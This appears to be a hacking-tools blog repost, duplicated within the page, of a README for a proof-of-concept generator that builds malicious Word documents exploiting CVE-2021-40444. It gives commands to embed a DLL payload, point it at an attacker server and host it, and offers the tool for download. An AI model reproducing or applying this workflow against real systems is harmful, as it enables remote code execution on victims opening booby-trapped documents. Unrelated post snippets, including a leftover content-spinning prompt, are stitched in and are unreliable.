Categories: Hacking & Pentesting Tools

CVE-2021-40444 PoC – Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)


Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)


Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)

You need to install lcab first (sudo apt-get install lcab)

Check REPRODUCE.md for manual reproduce steps

If your generated cab is not working, try pointing out exploit.html URL to calc.cab


Using

First generate a malicious docx document given a DLL, you can use the one at test/calc.dll which just pops a calc.exe from a call to system()

python3 exploit.py generate test/calc.dll http://<SRV IP>



Once you generate the malicious docx (will be at out/) you can setup the server:

sudo python3 exploit.py host 80



Finally try the docx in a Windows Virtual Machine:

 


Download CVE-2021-40444

Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)

Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)

You need to install lcab first (sudo apt-get install lcab)

Check REPRODUCE.md for manual reproduce steps

If your generated cab is not working, try pointing out exploit.html URL to calc.cab

Using

First generate a malicious docx document given a DLL, you can use the one at test/calc.dll which just pops a calc.exe from a call to system()

python3 exploit.py generate test/calc.dll http://<SRV IP>

Related Post
  1. How to Audit Password Changes in Active Directory
  2. CISA Warns of Severe Bugs in OpENer EtherNet/IP Stack for Industrial Systems
  3. Data Breach at Security Firm Stormshield Impacts Client Information, Source Code

Once you generate the malicious docx (will be at out/) you can setup the server:

sudo python3 exploit.py host 80

Finally try the docx in a Windows Virtual Machine:

 

Download CVE-2021-40444

click here to read full Article

Read More on Pentesting Tools

Leave a Comment
Leave a Comment
Share
Tags: codeCVE202140444Cybersecuritydocxethical hackingexecutionexploitGeneratorhack androidhack apphack wordpresshacker newshackinghacking tools for windowskeyloggerkitkitploitmaliciousMicrosoftOfficepassword brute forcepenetration testingpentestpentest androidpentest linuxpentest toolkitpentest toolsPOCRemotespy tool kitspywaretoolsWord
3 years ago

Recent Posts

rewrite this tittle: Understanding Peer-to-Peer Crypto Trading: Benefits and Threats

Write a AI detection pass, persuasive, cickable, catchy, well structured and seo optimized article with… Read More

3 weeks ago

Human Art Will Become More Valuable with the Help of AI

AI Will Make Human Art More Valuable AI models are increasing in popularity and value… Read More

1 year ago

Report Claims UK Government to Restrict TikTok Usage on Smartphones

UK Set to Announce Ban on TikTok on Government Smartphones: Report Following in the footsteps… Read More

1 year ago

The Potential Impact of ChatGPT and Generative AI on Travel

How ChatGPT and Generative AI Could Change the Way We Travel The travel industry is… Read More

1 year ago

Unraveling the Enigma of Pluto: Is It a Dwarf Planet, Comet, or Asteroid? Uncover the Facts.

The curious case of Pluto! Is it a dwarf planet, comet or an asteroid? This… Read More

1 year ago

A LinkedIn Connection Request From a Spy

A Spy Wants to Connect with You on LinkedIn: How to Spot and Avoid Fake… Read More

1 year ago